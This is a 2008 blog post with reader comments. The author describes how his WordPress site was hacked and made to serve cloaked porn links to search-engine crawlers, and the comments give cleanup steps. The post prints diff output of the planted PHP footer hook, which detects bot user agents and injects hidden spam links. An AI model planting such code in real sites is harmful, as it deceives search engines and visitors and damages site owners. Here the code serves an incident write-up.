Pocket SEO Was Hacked :(

Share This

PocketSEO.com suddenly dropped in the SERPs so I did some investigating.

It turns out that my site was hacked and a backdoor was installed. Someone was inserting cloaked porn links in the footer.

Here is what happens when you search Google for site:pocketseo.com porn. Until today I had a noarchive meta tag so this is the only way to view it.

click here for a screenshot (explicit words blacked out)

The hacker uploaded some files that included a function called wpc7c16b8466d864eeefd20050625c7775() that added cloaked links to the site.

This is partial output of a diff run on the site - it comes from a new file called class-mail.php:

+
+add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
+function wpc7c16b8466d864eeefd20050625c7775() {
+	$seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
+	$sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
+	if(!($sebot==1 && sizeof($_COOKIE)==0)) return;
+	@include('./wp-includes/class-mail.php');
+	if(sizeof($wparr)>0){
+		shuffle($wparr);
+		echo "<div id=\"_wp_footer\">";
+		foreach($wparr as $k=>$v){
+			echo "<a href=\"".$v['url']."\" title=\"".ucwords($v['key'])."\">".ucwords($v['key'])."</a>\n";
+			if($i++==$inum) break;
+		}
+		echo "</div>".$_footer;
+	}
+}
+

Other Victims

Here are a few other sites that mention the problem:

I’ve upgraded WordPress, and filed a reinclusion request with Google. Lesson learned: always stay updated with the latest version of WordPress…

UPDATE: 22 March 2008

Google’s “bad news” response to my reinclusion request:

March 20, 2008

We’ve received a request from a site owner to reconsider the following site for inclusion in our index: http://pocketseo.com/

We’ll review the site. If we find that it’s no longer in violation of our Webmaster Guidelines, we’ll reinclude the site in our index. Please allow several weeks for the reconsideration request. We do review all requests, but unfortunately we can’t reply individually to each request.

Related Articles:
This entry was written by Josh and posted on March 20, 2008 at 3:10 am and filed under Black Hat. Bookmark the permalink. Follow any comments here with the RSS feed for this post. Post a comment or leave a trackback: Trackback URL.

9 Comments

  1. jan Mozilla Firefox Mac OS
    Posted March 20, 2008 at 3:19 am | Permalink

    use a blog system that has a dedicated security team like drupal.
    wordpress kicks out new versions all the time without fixing old security issues.

  2. Josh Mozilla Firefox Ubuntu Linux
    Posted March 20, 2008 at 3:24 am | Permalink

    I am normally a Drupal user. PocketSEO.com was just an experiment to become more familiar with WordPress. I prefer Drupal.

    It was partly my fault for running WordPress 2.1.3 until today. I just upgraded to the latest version (2.3.3).

  3. stinkie Mozilla Firefox Windows
    Posted March 20, 2008 at 6:32 am | Permalink

    Josh, I got hacked a couple months ago by someone inserting posts with cell phone ads. They were making the post dates old so they would be mixed in months back. I just happen to be looking at WassUp plugin at the same time they were making the posts. They only got about three in before I found them and deleted them all. The changed my password and upgraded.

    It is a never ending battle between hackers/spammers and site owners.

  4. stinkie Mozilla Firefox Windows
    Posted March 20, 2008 at 6:34 am | Permalink

    BTW, it is always a good idea to do searches like you you did above every once in a while.

  5. Josh Mozilla Firefox Ubuntu Linux
    Posted March 20, 2008 at 6:40 am | Permalink

    I just happen to be looking at WassUp plugin at the same time they were making the posts. They only got about three in before I found them and deleted them all.

    That was lucky. I don’t post here often at the moment and I missed it for at least a couple of weeks - maybe longer. I lost my Google rankings.

    BTW, it is always a good idea to do searches like you you did above every once in a while.

    I set up Google Alerts for it after it happened. Example:
    site:pocketseo.com porn

  6. Argentina's Travel Mozilla Firefox Mac OS
    Posted March 23, 2008 at 9:37 pm | Permalink

    Just happened to us! My bad for not updating. It would be really useful if you could explain how to fix it here. Thanks.

  7. Josh Mozilla Firefox Ubuntu Linux
    Posted March 23, 2008 at 10:45 pm | Permalink

    It would be really useful if you could explain how to fix it here.

    Here are the steps to fix it:

    1. Backup all of your files and database
    2. It’s a good idea to make sure that your backup works by installing it locally
    3. I ran a diff on my hacked version of WP vs. a clean version of WP. To run diff, make a directory with two subdirectories. Put your hacked site in one and a clean copy of the same version of WP in the other. Then in the Linux terminal type diff -rup >output.txt. The file called “output.txt” will show a list of all changes between your hacked version of WP and a clean copy of WP. If you aren’t running Linux, you could either use an Ubuntu live CD or install Linux on an external hard drive. Three other methods for running diff are to do it remotely over SSH, to run Mac OS/X, or install Cygwin on Windows.
    4. Delete all of your remote WordPress files. You can temporarily put a blank index.html while upgrading so that people can’t read your directory.
    5. Go into PHPmyAdmin and search your database for keywords like porn and ringtones just to make sure nothing was injected into the database.
    6. Upgrade to the latest version of WordPress, including uploading your customized files, including config.php, plugins, etc.
    7. Change your WordPress password and FTP password
    8. Then be sure to follow these steps.

    Hope that helps…

  8. Mo Mozilla Firefox Windows
    Posted March 27, 2008 at 10:12 pm | Permalink

    Just had the same thing happen to me, didn’t even get time to rectify the hackery before google vaped the entire site from it’s index.

    I think it’s time for a move to drupal.

  9. Josh Mozilla Firefox Ubuntu Linux
    Posted March 27, 2008 at 11:32 pm | Permalink

    @Mo

    Drupal is great. Most of what I do is Drupal. This PocketSEO.com blog was just a WordPress experiment.

3 Trackbacks

  1. By How To Defend Against Porn Link Injection - Pocket SEO on March 21, 2008 at 7:38 am

    […] wrote a post yesterday about how PocketSEO.com was hacked. This site has been heavily penalized because cloaked, hidden porn links were being injected into […]

  2. By WordPress, Google Groups, Porn Spam and Malware Distribution - Pocket SEO on March 22, 2008 at 10:13 am

    […] was cleaning out spam comments today, thinking about how this site got hacked a few days ago. Most of the spam comments that bypass Akismet on this site link to pages full of […]

  3. By How Long Does It Take For a Google Reinclusion Request? - Pocket SEO on March 29, 2008 at 12:49 am

    […] mentioned on the 20th, PocketSEO.com was hacked and penalized by Google. I submitted a reinclusion request the same day that I discovered the […]

Post a Comment

Your email is never published nor shared. Required fields are marked *

*
*
Close
E-mail It